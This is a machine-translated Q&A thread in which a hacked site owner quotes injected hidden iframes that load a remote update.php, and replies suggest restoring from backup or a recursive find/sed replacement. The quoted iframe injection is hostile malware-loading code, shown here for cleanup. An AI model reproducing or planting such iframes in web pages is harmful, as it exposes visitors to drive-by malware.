代碼注入幫助搜索和Linux上

更換

我的網站已經被黑客入侵，並注入一些代碼，這樣代碼注入幫助搜索和Linux上

<i> 
    <iframe src="http://www.cascadecowcutters.org/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe><iframe src="http://www.cascadecowcutters.org/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe> 
</i>

是否有在Linux的方式來搜索和替換此代碼這個'？遞歸

來源

2012-11-13 Monski

您可以使用'sed'，但是您可能最好從備份恢復，因爲您永遠無法確切知道黑客做了什麼。 –

所以我們必須填補空白？ – Dinesh

受損服務器的唯一選擇是從軌道核彈，並祈禱你的備份是好的。 – lynks

要「查找」中的所有文件和搜索這些文件替換：

find ./ -type f | xargs sed -i 's/string1/string2/g'

正如喬金 - 在他的評論中提到的，任何時候你正在處理一個妥協的服務器時，它是最安全的做一個完整的擦拭<>恢復。恢復之前一定要檢查漏洞利用。確保你知道你的所有網絡應用都是最新版本。

來源

2012-11-13 14:38:53 John

那是一個非常可怕的命令。 – lynks

這是他們注入我的所有網站文件的代碼.... 對不起，我的第一篇文章.....所以我需要做這樣的終端找到./ -type f | xargs sed -i's/INJECTED CODE/WHITSPACE/g' – Monski

@Monski'INJECTED CODE'應該正確地轉義到正則表達式中工作 –

代碼注入幫助搜索和Linux上

回答

相關問題